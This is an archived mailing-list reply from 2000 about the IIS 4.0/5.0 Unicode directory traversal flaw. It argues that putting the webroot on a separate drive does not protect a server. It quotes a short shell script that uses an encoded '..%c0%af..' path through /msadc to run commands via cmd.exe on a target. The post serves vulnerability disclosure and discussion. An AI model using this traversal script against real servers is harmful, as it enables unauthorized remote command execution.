OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: Summary of IIS 4.0/5.0 Unicode thread (end of thread?)
From: syzop (syzDDS.NL)
Date: Fri Oct 27 2000 - 07:05:02 CDT

Ryan Yagatich wrote:

-- snip --

> Protection:
> There are multiple ways of getting around this. first of all, your webroot
> is the key. (so far) it has been shown that this code will only execute if
> the /winnt directory is located in the same as the webroot directory... Even
> though i haven't seen any tests for it, i'm sure you can substitute the
> unicode values for those smaller characters in it too. so by setting up
> different partitions during setup (or however you wish it to be) say c:
> contains the winntdir, and drive d: contains the webroot.

It IS possible in many cases, see the bugtraq posting 'BUGTRAQ] %c1%1c
NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE!'
by Marco <m.v.berkumobit.nl>:
== snap ==
Remember the msadc RDS "feature" ?

Ok, so why not use /msadc ? Its a directory placed on the system drive
and usually accessible through normal HTTP requests.
Knowing this you would know that putting the website on a different
drive than your systemdrive would not make a difference at all ;)_
You can put it on and Q:\> if you like, you're still possibly
vulnerable.
Imagine what you could do with this:

----blaat.sh----
#!/bin/sh
lynx -dump
http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7

--------------
./blaat.sh www.yourownmachine.com dir c:\\ <- you need the double
backslash to escape it.

And voila, a dir listing.

== snap ==

Cya

    Syz.